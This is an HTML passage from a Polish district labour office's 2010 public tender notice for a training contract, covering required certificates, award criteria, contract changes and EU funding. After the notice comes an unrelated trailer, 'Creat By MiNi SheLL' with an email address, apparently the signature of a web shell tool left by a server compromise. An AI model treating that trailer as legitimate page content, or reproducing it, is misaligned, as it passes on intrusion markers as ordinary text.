<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych na uzasadniony wniosek Zamawiającego, przewiduje się możliwość dokonania zmian w umowie dot. zmniejszenia liczby uczestników szkolenia w przypadku wystąpienia okoliczności niezależnych i niezawinionych przez Zamawiającego, których nie można było przewidzieć w chwili zawarcia umowy, a powodujących, że wykonanie zamówienia nie jest możliwe w liczbie określonej przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pupwejherowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy
ul. I Brygady Pancernej WP 32
84-200 Wejherowo
pokój nr 201.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2010 godzina 09:00, miejsce: Powiatowy Urząd Pracy
ul. I Brygady Pancernej WP 32
84-200 Wejherowo
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Część uczestników szkolenia będzie finansowana z Funduszu Pracy, a część z Programu Operacyjnego Kapitał Ludzki Priorytet VI. Rynek Otwarty dla Wszystkich Działanie 6.1. Poprawa dostępu do Zatrudnienia oraz Wspieranie Aktywności Zawodowej w Regionie Poddziałanie 6.1.3. Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych Tytuł Projektu ZiP - Zaradny i Przedsiębiorczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com